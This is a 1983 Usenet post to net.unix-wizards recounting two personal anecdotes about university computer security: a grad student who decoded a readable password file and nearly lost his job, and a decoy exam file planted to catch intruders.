Relay-Version: version B 2.10 5/3/83; site utzoo.UUCP Path: utzoo!linus!genrad!decvax!harpo!floyd!vax135!ariel!hou5f!hou5e!hou5d!hogpc!houxm!hocda!spanky!burl!rcj From: rcj@burl.UUCP Newsgroups: net.unix-wizards Subject: Re: a thought about UNIX login security Message-ID: <206@burl.UUCP> Date: Sun, 19-Jun-83 17:56:34 EDT Article-I.D.: burl.206 Posted: Sun Jun 19 17:56:34 1983 Date-Received: Thu, 23-Jun-83 00:17:30 EDT Lines: 58 As one of the more guilty parties (re: Ed's article about not discussing security in net.unix-wizards), I feel obligated to relate a real-life example of a system break-in (the only really major one that I have first-hand experience with), and the consequences thereof: I went to school at a major Southern university. We primarily used a DEC-10 running the TOPS-10 operating system, although we switched to Unix on a PDP-11/34 for the upper-level courses later. The school of pharmacy made great use of the DEC-10 for research purposes, and there was one grad student in pharmacy who was the guru for the whole pharmacy school. This grad student was liked by EVERYONE, taught two computer courses for the computer science dept. every term, and had won several awards from the University. If any of the pharmacy faculty (or anyone else he knew) forgot their password, they just went to Jim (not his real name) and he would pull out a little printout that he had and tell them. This went on for some time until someone as the Computing Center found out about it and hit the ceiling. Apparently, (and remember, this is not Unix), someone had the password file VERY well protected, but the binary copy that was actually read by the system was readable by everyone. Jim found this out, got a dump of the binary, and used a sliding window technique to find out the password field and then decoded the simple ASCII. Even though it was demonstrated to everyone's satisfaction that Jim did not take advantage of this information in ANY way whatsoever, and even taking into account his very high standing with the University, and even though both the Computer Science dept. of the School of Engineering and the Dean of Pharmacy School came to bat for him, he still came within one vote of losing his job. And this information was just lying around for anyone to look at -- all he had to do was a very simple decoding. Imagine what would have happened had he really had to break a lot of stuff to get in!!! Because I worked on our Unix installation, I had privileged access (read: root password). One day, I was trying to find something for one of my professors when I catted a file that came up: Second Semester Final for CSCI xxx I immediately hit delete, and went to my professor later to tell him exactly what had happened in case he had some sort of accounting daemon running that I didn't know about. He smiled, said it was ok, and that he had three bogus copies of that final on disk just to catch anyone who might break in. He told me further that the real exam was always typed in by his assistant on the night before the exam, or even the morning thereof. Computer Science professors (and, increasingly, those in other areas) know that students will try to break in -- and those possible access methods are usually not totally booby-trap-free. It ain't worth it, when there's so much money to be made so easy in computer-related fields, -- The MAD Programmer -- 919-228-3814 (Cornet 291) alias: Curtis Jackson ...![ floyd sb1 mhuxv ]!burl!rcj